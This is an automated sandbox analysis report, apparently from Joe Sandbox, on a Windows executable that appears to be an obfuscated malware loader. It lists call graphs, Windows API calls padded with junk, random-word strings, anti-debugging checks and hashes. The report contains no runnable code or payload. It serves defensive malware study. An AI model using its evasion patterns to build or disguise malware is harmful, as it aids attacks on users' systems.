404ed4 7711 404ee0 _flsall 7710->7711 7712 404ef8 7711->7712 7713 404fe2 _flsall 7711->7713 7714 4010ad ___free_lconv_mon 67 API calls 7711->7714 7715 404f06 7712->7715 7716 4010ad ___free_lconv_mon 67 API calls 7712->7716 7714->7712 7717 404f14 7715->7717 7719 4010ad ___free_lconv_mon 67 API calls 7715->7719 7716->7715 7718 404f22 7717->7718 7720 4010ad ___free_lconv_mon 67 API calls 7717->7720 7721 4010ad ___free_lconv_mon 67 API calls 7718->7721 7722 404f30 7718->7722 7719->7717 7720->7718 7721->7722 7723 404f3e 7722->7723 7724 4010ad ___free_lconv_mon 67 API calls 7722->7724 7725 404f4c 7723->7725 7727 4010ad ___free_lconv_mon 67 API calls 7723->7727 7724->7723 7726 404f5d 7725->7726 7728 4010ad ___free_lconv_mon 67 API calls 7725->7728 7729 40285b __lock 67 API calls 7726->7729 7727->7725 7728->7726 7730 404f65 7729->7730 7731 404f71 InterlockedDecrement 7730->7731 7732 404f8a 7730->7732 7731->7732 7733 404f7c 7731->7733 7746 404fee 7732->7746 7733->7732 7736 4010ad ___free_lconv_mon 67 API calls 7733->7736 7736->7732 7737 40285b __lock 67 API calls 7738 404f9e 7737->7738 7739 404fcf 7738->7739 7740 406575 ___removelocaleref 8 API calls 7738->7740 7749 404ffa 7739->7749 7744 404fb3 7740->7744 7743 4010ad ___free_lconv_mon 67 API calls 7743->7713 7744->7739 7745 40639d ___freetlocinfo 67 API calls 7744->7745 7745->7739 7752 402781 LeaveCriticalSection 7746->7752 7748 404f97 7748->7737 7753 402781 LeaveCriticalSection 7749->7753 7751 404fdc 7751->7743 7752->7748 7753->7751 7781 409294 RtlUnwind 7283 423b62 7284 423b6a __cfltcvt_init 7283->7284 7289 4246c7 GetModuleHandleA 7284->7289 7287 423b7f 7290 4246d6 GetProcAddress 7289->7290 7291 423b6f 7289->7291 7290->7291 7291->7287 7292 42465e 7291->7292 7297 424b7f 7292->7297 7294 424673 7295 424684 7294->7295 7296 4024d6 __invoke_watson 10 API calls 7294->7296 7295->7287 7296->7295 7299 424b9a __control87 7297->7299 7302 424bc3 __control87 7297->7302 7298 402666 __cftof2_l 67 API calls 7300 424bb4 7298->7300 7299->7298 7301 4025fe __cftof2_l 6 API calls 7300->7301 7301->7302 7302->7294 7303 408d60 7304 40368a __amsg_exit 67 API calls 7303->7304 7305 408d67 7304->7305 7424 423d22 7427 423bf6 7424->7427 7428 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7427->7428 7429 423c0a 7428->7429 7754 404ce0 TlsAlloc 7430 404422 7431 40445e 7430->7431 7432 404434 7430->7432 7432->7431 7434 40730b 7432->7434 7435 407317 _flsall 7434->7435 7436 404eba __getptd 67 API calls 7435->7436 7437 40731c 7436->7437 7440 40946e 7437->7440 7441 40948d 7440->7441 7444 409494 7440->7444 7442 403992 __NMSG_WRITE 67 API calls 7441->7442 7442->7444 7452 4073aa 7444->7452 7446 4094a5 _memset 7448 40957d 7446->7448 7451 40953d SetUnhandledExceptionFilter UnhandledExceptionFilter 7446->7451 7449 403910 _raise 67 API calls 7448->7449 7450 409584 7449->7450 7451->7448 7453 404c6e __decode_pointer 6 API calls 7452->7453 7454 4073b5 7453->7454 7454->7446 7455 4073b7 7454->7455 7458 4073c3 _flsall 7455->7458 7456 40741f 7457 407400 7456->7457 7462 40742e 7456->7462 7461 404c6e __decode_pointer 6 API calls 7457->7461 7458->7456 7458->7457 7459 4073ea 7458->7459 7465 4073e6 7458->7465 7460 404e41 __getptd_noexit 67 API calls 7459->7460 7463 4073ef _siglookup 7460->7463 7461->7463 7464 402666 __cftof2_l 67 API calls 7462->7464 7467 407495 7463->7467 7469 403910 _raise 67 API calls 7463->7469 7475 4073f8 _flsall 7463->7475 7466 407433 7464->7466 7465->7459 7465->7462 7468 4025fe __cftof2_l 6 API calls 7466->7468 7470 40285b __lock 67 API calls 7467->7470 7471 4074a0 7467->7471 7468->7475 7469->7467 7470->7471 7472 404c65 _raise 6 API calls 7471->7472 7473 4074d5 7471->7473 7472->7473 7476 40752b 7473->7476 7475->7446 7477 407531 7476->7477 7478 407538 7476->7478 7480 402781 LeaveCriticalSection 7477->7480 7478->7475 7480->7478 7755 4018e2 7759 4018f3 7755->7759 7756 4018f9 7757 401889 101 API calls _write_multi_char 7757->7759 7758 402666 __cftof2_l 67 API calls 7758->7759 7759->7756 7759->7757 7759->7758 7782 4041a3 7783 4041b0 7782->7783 7784 406728 __calloc_crt 67 API calls 7783->7784 7785 4041ca 7784->7785 7786 406728 __calloc_crt 67 API calls 7785->7786 7787 4041e3 7785->7787 7786->7787 7306 404464 SetUnhandledExceptionFilter 7481 40272a 7482 40273a 7481->7482 7483 40275e 7482->7483 7484 402746 DeleteCriticalSection 7482->7484 7486 402770 DeleteCriticalSection 7483->7486 7487 40277e 7483->7487 7485 4010ad ___free_lconv_mon 67 API calls 7484->7485 7485->7482 7486->7483 7488 40732f 7489 407332 7488->7489 7490 40946e _abort 69 API calls 7489->7490 7491 40733e _flsall 7490->7491 7788 4033b0 7789 4033e9 7788->7789 7790 4033dc 7788->7790 7792 401006 __ftelli64_nolock 5 API calls 7789->7792 7791 401006 __ftelli64_nolock 5 API calls 7790->7791 7791->7789 7798 4033f9 __except_handler4 __IsNonwritableInCurrentImage 7792->7798 7793 40347c 7794 403452 __except_handler4 7794->7793 7795 40346c 7794->7795 7796 401006 __ftelli64_nolock 5 API calls 7794->7796 7797 401006 __ftelli64_nolock 5 API calls 7795->7797 7796->7795 7797->7793 7798->7793 7798->7794 7804 40704a RtlUnwind 7798->7804 7800 4034cb __except_handler4 7801 4034ff 7800->7801 7802 401006 __ftelli64_nolock 5 API calls 7800->7802 7803 401006 __ftelli64_nolock 5 API calls 7801->7803 7802->7801 7803->7794 7804->7800 7760 4097f7 7761 409810 7760->7761 7762 409808 7760->7762 7764 409822 7761->7764 7765 40981f CloseHandle 7761->7765 7762->7761 7763 40980d CloseHandle 7762->7763 7763->7761 7765->7764 7809 406fb8 7810 406fca 7809->7810 7812 406fd8 @_EH4_CallFilterFunc@8 7809->7812 7811 401006 __ftelli64_nolock 5 API calls 7810->7811 7811->7812 7492 42463b 7495 4245b3 7492->7495 7494 424659 7496 4245c0 7495->7496 7497 42461f 7495->7497 7496->7497 7499 4245c5 7496->7499 7553 423ea4 7497->7553 7500 4245e3 7499->7500 7501 4245ca 7499->7501 7502 424606 7500->7502 7504 4245ed 7500->7504 7509 4243fe 7501->7509 7540 423f94 7502->7540 7523 4244b9 7504->7523 7508 424604 7508->7494 7567 4249e9 7509->7567 7512 424438 7513 402666 __cftof2_l 67 API calls 7512->7513 7515 42443d 7513->7515 7514 424457 7577 42486d 7514->7577 7516 4025fe __cftof2_l 6 API calls 7515->7516 7518 424449 7516->7518 7520 401006 __ftelli64_nolock 5 API calls 7518->7520 7522 4244b7 7520->7522 7522->7494 7524 4249e9 __fltout2 67 API calls 7523->7524 7525 4244ea 7524->7525 7526 4244f3 7525->7526 7528 424515 7525->7528 7527 402666 __cftof2_l 67 API calls 7526->7527 7529 4244f8 7527->7529 7531 42486d __fptostr 67 API calls 7528->7531 7530 4025fe __cftof2_l 6 API calls 7529->7530 7538 424504 7530->7538 7532 424541 7531->7532 7534 424588 7532->7534 7536 424560 7532->7536 7532->7538 7533 401006 __ftelli64_nolock 5 API calls 7535 4245b1 7533->7535 7621 423d35 7534->7621 7535->7508 7539 424307 __cftof2_l 77 API calls 7536->7539 7538->7533 7539->7538 7541 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7540->7541 7542 423fb9 7541->7542 7543 423fc8 7542->7543 7544 423ff8 7542->7544 7545 402666 __cftof2_l 67 API calls 7543->7545 7546 424006 7544->7546 7550 42400f 7544->7550 7547 423fcd 7545->7547 7548 402666 __cftof2_l 67 API calls 7546->7548 7549 4025fe __cftof2_l 6 API calls 7547->7549 7548->7547 7552 423fdc _memset __alldvrm __cftoa_l _strrchr 7549->7552 7550->7552 7640 423f74 7550->7640 7552->7508 7554 4249e9 __fltout2 67 API calls 7553->7554 7555 423ed5 7554->7555 7556 423ede 7555->7556 7558 423efd 7555->7558 7557 402666 __cftof2_l 67 API calls 7556->7557 7559 423ee3 7557->7559 7561 42486d __fptostr 67 API calls 7558->7561 7560 4025fe __cftof2_l 6 API calls 7559->7560 7566 423eef 7560->7566 7562 423f41 7561->7562 7565 423d35 __cftoe2_l 77 API calls 7562->7565 7562->7566 7563 401006 __ftelli64_nolock 5 API calls 7564 423f72 7563->7564 7564->7508 7565->7566 7566->7563 7568 424a14 ___dtold 7567->7568 7603 425d6b 7568->7603 7571 407817 _strcpy_s 67 API calls 7572 424a4f 7571->7572 7573 4024d6 __invoke_watson 10 API calls 7572->7573 7576 424a62 7572->7576 7573->7576 7574 401006 __ftelli64_nolock 5 API calls 7575 42442f 7574->7575 7575->7512 7575->7514 7576->7574 7578 4248a2 7577->7578 7579 424884 7577->7579 7578->7579 7581 4248a7 7578->7581 7580 402666 __cftof2_l 67 API calls 7579->7580 7582 424889 7580->7582 7584 4248bc 7581->7584 7587 4248ca _strlen 7581->7587 7583 4025fe __cftof2_l 6 API calls 7582->7583 7586 42448a 7583->7586 7585 402666 __cftof2_l 67 API calls 7584->7585 7585->7582 7586->7518 7589 424307 7586->7589 7587->7586 7588 406bc0 __shift __VEC_memcpy 7587->7588 7588->7586 7590 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7589->7590 7591 424325 7590->7591 7592 424329 7591->7592 7593 42435c 7591->7593 7594 402666 __cftof2_l 67 API calls 7592->7594 7597 424398 7593->7597 7617 423cf0 7593->7617 7595 42432e 7594->7595 7596 4025fe __cftof2_l 6 API calls 7595->7596 7602 42433f _memset 7596->7602 7599 423cf0 __shift __VEC_memcpy 7597->7599 7597->7602 7600 4243ad 7599->7600 7601 423cf0 __shift __VEC_memcpy 7600->7601 7600->7602 7601->7602 7602->7518 7606 425de1 7603->7606 7604 425e4e 7608 407817 _strcpy_s 67 API calls 7604->7608 7605 401006 __ftelli64_nolock 5 API calls 7607 424a2f 7605->7607 7606->7604 7609 425e66 7606->7609 7616 425dfe 7606->7616 7607->7571 7610 425eb1 7608->7610 7611 407817 _strcpy_s 67 API calls 7609->7611 7612 4024d6 __invoke_watson 10 API calls 7610->7612 7610->7616 7613 425e85 7611->7613 7612->7616 7614 4024d6 __invoke_watson 10 API calls 7613->7614 7613->7616 7614->7616 7615 426663 7616->7605 7616->7615 7618 423cf9 _strlen 7617->7618 7619 423d0a 7617->7619 7620 406bc0 __shift __VEC_memcpy 7618->7620 7619->7597 7620->7619 7622 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7621->7622 7623 423d4d 7622->7623 7624 423d53 7623->7624 7625 423d83 7623->7625 7626 402666 __cftof2_l 67 API calls 7624->7626 7628 423da0 7625->7628 7629 423d97 7625->7629 7627 423d58 7626->7627 7630 4025fe __cftof2_l 6 API calls 7627->7630 7633 423cf0 __shift __VEC_memcpy 7628->7633 7634 423dc4 7628->7634 7631 402666 __cftof2_l 67 API calls 7629->7631 7632 423d67 7630->7632 7631->7627 7632->7538 7633->7634 7635 407817 _strcpy_s 67 API calls 7634->7635 7636 423e1b 7635->7636 7637 4024d6 __invoke_watson 10 API calls 7636->7637 7638 423e2e 7636->7638 7637->7638 7638->7632 7639 406bc0 __shift __VEC_memcpy 7638->7639 7639->7632 7641 423ea4 __cftoe_l 77 API calls 7640->7641 7642 423f8f 7641->7642 7642->7552 7643 40153b 7646 404473 7643->7646 7647 404e41 __getptd_noexit 67 API calls 7646->7647 7648 40154c 7647->7648 7813 4018bc 7814 4018c6 7813->7814 7815 4018df 7814->7815 7817 401889 7814->7817 7818 40188f 7817->7818 7819 40189a 7818->7819 7820 40169e __flsbuf 101 API calls 7818->7820 7819->7814 7820->7819

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 42379f-4237c2 call 4078d0 3 4237c4-4237c9 0->3 4 4237cb-4237d7 3->4 5 4237dd-4237e7 3->5 4->5 6 4237fa-423800 5->6 7 4237e9-4237f0 5->7 6->3 8 423802 6->8 7->6 9 423804-42380a 8->9 10 423816-42381d 9->10 11 42380c-423811 9->11 12 423834-42383b 10->12 13 42381f-42382e GetLogicalDriveStringsW DeleteVolumeMountPointW GetCommandLineA 10->13 11->10 12->9 14 42383d-423844 12->14 13->12 15 42384a-423928 lstrcatW InterlockedExchange GetActiveWindow GetSystemWindowsDirectoryW WriteConsoleW IntersectRect FlushInstructionCache GetAtomNameA GlobalDeleteAtom GetCurrentConsoleFont SearchPathA call 406ad0 GetDefaultCommConfigA DebugBreak EnumDateFormatsW 14->15 16 423948 14->16 25 42393a-423947 call 401302 call 401318 15->25 26 42392a-423938 LoadLibraryA * 2 15->26 17 42394a-423972 SetCommMask GetTickCount GetSystemTimes 16->17 19 423974-42397b 17->19 20 42397f-423986 17->20 19->17 22 42397d 19->22 23 423993-42399a 20->23 24 423988-42398d FoldStringW 20->24 22->23 28 4239a0-423a3e OpenWaitableTimerA HeapLock FormatMessageW call 401323 call 4011ca call 401093 call 4010ad call 40113b call 401323 call 407c1d call 40113b call 401294 call 40113b 23->28 29 423a41-423a5d GlobalAlloc 23->29 24->23 25->16 26->25 28->29 31 423a86-423aa0 LoadLibraryA call 423485 call 423467 call 42370a 29->31 32 423a5f-423a75 29->32 51 423aa2-423aa7 31->51 35 423a81-423a84 32->35 36 423a77 32->36 35->31 35->32 36->35 53 423aa9 call 42345c 51->53 54 423aae-423ab4 51->54 53->54 54->51 55 423ab6 54->55 58 423ac0-423ac6 55->58 60 423ad2-423ad9 58->60 61 423ac8-423ad0 58->61 60->58 63 423adb-423aef call 401006 60->63 61->60 61->63
                            APIs
                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 00423821
                            • DeleteVolumeMountPointW.KERNEL32(00000000,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 00423828
                            • GetCommandLineA.KERNEL32(?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 0042382E
                            • lstrcatW.KERNEL32(?,00000000), ref: 00423853
                            • InterlockedExchange.KERNEL32(?,00000000), ref: 0042385F
                            • GetActiveWindow.USER32 ref: 00423865
                            • GetSystemWindowsDirectoryW.KERNEL32(?,00000000), ref: 00423874
                            • WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 0042388A
                            • IntersectRect.USER32(?,?,00000000), ref: 0042389B
                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 004238A4
                            • GetAtomNameA.KERNEL32(00000000,?,00000000), ref: 004238B4
                            • GlobalDeleteAtom.KERNEL32(00000000), ref: 004238BB
                            • GetCurrentConsoleFont.KERNEL32(00000000,00000000,?,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 004238C8
                            • SearchPathA.KERNEL32(Yihoses worowopep,Jaxukutoceh jozewo,Duhadakafu wofelewubogo xamuludemuhi gurujocakujuw,00000000,?,?,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 004238EB
                            • _memset.LIBCMT ref: 004238FD
                            • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 0042390C
                            • DebugBreak.KERNEL32 ref: 00423912
                            • EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 0042391B
                            • LoadLibraryA.KERNEL32(00000000), ref: 00423931
                            • LoadLibraryA.KERNEL32(emuritowuwep), ref: 00423938
                              • Part of subcall function 00401302: __wcstoi64.LIBCMT ref: 0040130E
                            • SetCommMask.KERNELBASE(00000000,00000000,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 0042394C
                            • GetTickCount.KERNEL32 ref: 00423952
                            • GetSystemTimes.KERNEL32(?,?,?,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 00423967
                            • FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000001,?,00423AF5,00401523,00400000), ref: 0042398D
                            • OpenWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 004239AF
                            • HeapLock.KERNEL32(00000000,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 004239B6
                            • FormatMessageW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000), ref: 004239CA
                            • _printf.LIBCMT ref: 004239E7
                            • _malloc.LIBCMT ref: 004239ED
                            • __vswprintf.LIBCMT ref: 00423A03
                            • _calloc.LIBCMT ref: 00423A10
                            • _printf.LIBCMT ref: 00423A1C
                            • _calloc.LIBCMT ref: 00423A28
                            • _fgetpos.LIBCMT ref: 00423A32
                            • _calloc.LIBCMT ref: 00423A39
                            • GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 00423A48
                            • LoadLibraryA.KERNEL32(msimg32.dll,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 00423A8B
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: LibraryLoad_calloc$AtomCommConsoleDeleteGlobalSystem_printf$ActiveAllocBreakCacheCommandConfigCountCurrentDateDebugDefaultDirectoryDriveEnumExchangeFlushFoldFontFormatFormatsHeapInstructionInterlockedIntersectLineLockLogicalMaskMessageMountNameOpenPathPointRectSearchStringStringsTickTimerTimesVolumeWaitableWindowWindowsWrite__vswprintf__wcstoi64_fgetpos_malloc_memsetlstrcat
                            • String ID: %s %c$%s %f %c$0 %f$Duhadakafu wofelewubogo xamuludemuhi gurujocakujuw$Jaxukutoceh jozewo$Pev$Yihoses worowopep$emuritowuwep$k`$msimg32.dll$}$
                            • API String ID: 1820217008-732333065
                            • Opcode ID: a1ab79323c1a95ccc9c26174e22bfe311174686985f8be92119be2d411ed885f
                            • Instruction ID: 8dbc5d9f7ccbc57e8f3c20c9d260084f9863f046cce8ff7655e10ccfc7c1cc5d
                            • Opcode Fuzzy Hash: a1ab79323c1a95ccc9c26174e22bfe311174686985f8be92119be2d411ed885f
                            • Instruction Fuzzy Hash: B8819072606130AFC721AF61EC49C9F7BACEF4A355B80443AF585D2161DB3C4646CBAE

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                            • String ID:
                            • API String ID: 2477803136-0
                            • Opcode ID: eb119a3c39fd4835dba04421693814566908bcf32f3bfbb0ef04930a60541643
                            • Instruction ID: 8e62b3500c5768de0fb0972e9e30bc58fc2e5440a680f1adf78b159871465520
                            • Opcode Fuzzy Hash: eb119a3c39fd4835dba04421693814566908bcf32f3bfbb0ef04930a60541643
                            • Instruction Fuzzy Hash: 312197B0900305A9DB247FB2A886B6E2668AF4075DF10493FF9057A1E2EB7C89409B5D

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 136 4026af-4026d1 HeapCreate 137 4026d3-4026d4 136->137 138 4026d5-4026de 136->138
                            APIs
                            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004026C4
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: CreateHeap
                            • String ID:
                            • API String ID: 10892065-0
                            • Opcode ID: 3d5f5e671e91ae1df486ff181aba876469fa193ecfa479a68fe214cac1e65b00
                            • Instruction ID: ee0cfddc00ff7ee0933909f523ceabc00ff2598ea9691a22b50d1bb8cd8728f6
                            • Opcode Fuzzy Hash: 3d5f5e671e91ae1df486ff181aba876469fa193ecfa479a68fe214cac1e65b00
                            • Instruction Fuzzy Hash: DFD05E32A543089BDB105F706C0A7623BECD3847A5F544436B90DC6690E6B4D9918588

                            Control-flow Graph

                            APIs
                            • IsDebuggerPresent.KERNEL32 ref: 00401653
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401668
                            • UnhandledExceptionFilter.KERNEL32(004271E0), ref: 00401673
                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0040168F
                            • TerminateProcess.KERNEL32(00000000), ref: 00401696
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                            • String ID:
                            • API String ID: 2579439406-0
                            • Opcode ID: d5fe470e44ce5f7f528ad9339df5a5f2f4c585a15928b08a25921d4a2a5a6b09
                            • Instruction ID: 824123d5e3cd5fba26b156f8f396cb5c9432919fc78e99a8dc8de2703bcac8e4
                            • Opcode Fuzzy Hash: d5fe470e44ce5f7f528ad9339df5a5f2f4c585a15928b08a25921d4a2a5a6b09
                            • Instruction Fuzzy Hash: 5B21C0786042089FC720DF26FD45A443BA0FB08315FD0447AE90897BB4EBB569868F8D

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 144 423635-423662 145 423667-423670 144->145 146 423664-423665 GetNumaHighestNodeNumber 144->146 147 423672 145->147 148 4236e5-4236eb 145->148 146->145 151 423673-4236a0 call 42362a 147->151 149 4236fe-423709 call 401006 148->149 150 4236ed-4236f4 148->150 150->149 156 4236a2-4236d0 GetNumaHighestNodeNumber SetCalendarInfoW OpenJobObjectA GetShortPathNameA Sleep 151->156 157 4236d6-4236e2 151->157 156->157 157->151 158 4236e4 157->158 158->148
                            APIs
                            • GetNumaHighestNodeNumber.KERNEL32(00000000,00000000,?), ref: 00423665
                            • GetNumaHighestNodeNumber.KERNEL32(00000000,?,00000000,?), ref: 004236A3
                            • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,Cogi), ref: 004236AD
                            • OpenJobObjectA.KERNEL32(00000000,00000000,Rodohuvoboco jalajo sezafowebazobe dolarocuviveg), ref: 004236BA
                            • GetShortPathNameA.KERNEL32(00000000,?,00000000), ref: 004236C9
                            • Sleep.KERNEL32(00000000), ref: 004236D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: HighestNodeNumaNumber$CalendarInfoNameObjectOpenPathShortSleep
                            • String ID: -$Cogi$Rodohuvoboco jalajo sezafowebazobe dolarocuviveg
                            • API String ID: 2970987874-389815433
                            • Opcode ID: 5c364feddc24ff39079a9ff57fbb3d21603279bb8c3fb89d7a7422fafd61c146
                            • Instruction ID: deacb889439696245f735b3f4471453babfeec7347a63c5168fd63d97d027ef3
                            • Opcode Fuzzy Hash: 5c364feddc24ff39079a9ff57fbb3d21603279bb8c3fb89d7a7422fafd61c146
                            • Instruction Fuzzy Hash: 7921A771A00128EBC7319F15EC859AE7778EB85715F4080ADE659A7241C73C4A86CF6C

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 159 42370a-423734 160 423736-423744 GetFullPathNameW 159->160 161 42374a-42375d call 4235e6 159->161 160->161 164 423766-423779 call 423635 161->164 165 42375f-423760 FreeEnvironmentStringsW 161->165 168 423790-42379e call 401006 164->168 169 42377b-42378a HeapCreate SetFileShortNameA 164->169 165->164 169->168
                            APIs
                            • GetFullPathNameW.KERNEL32(gumumateseyewemisisapef,00000000,?,00000000,00000000,00000000,00000001), ref: 00423744
                            • FreeEnvironmentStringsW.KERNEL32(00000000,00000000,00000001), ref: 00423760
                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000000,00000001), ref: 0042377E
                            • SetFileShortNameA.KERNEL32(00000000,ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi), ref: 0042378A
                            Strings
                            • gumumateseyewemisisapef, xrefs: 0042373F
                            • ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi, xrefs: 00423784
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: Name$CreateEnvironmentFileFreeFullHeapPathShortStrings
                            • String ID: gumumateseyewemisisapef$ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi
                            • API String ID: 4071102102-3457428971
                            • Opcode ID: 4118aea02ff7cce9f021c469c9c8a939c1348656a373ad51a8f1151b96d27343
                            • Instruction ID: 4f65d5ff727ea9b5f32b9490f161a63e31010cc474a4420f8d895bd29f22500d
                            • Opcode Fuzzy Hash: 4118aea02ff7cce9f021c469c9c8a939c1348656a373ad51a8f1151b96d27343
                            • Instruction Fuzzy Hash: B101B1B1704124AFCB20AF69BC89D6B77BCE78971AB80503FF501D2150DA3C1945CB6E

                            Control-flow Graph

                            • Executed
                            • Not Executed
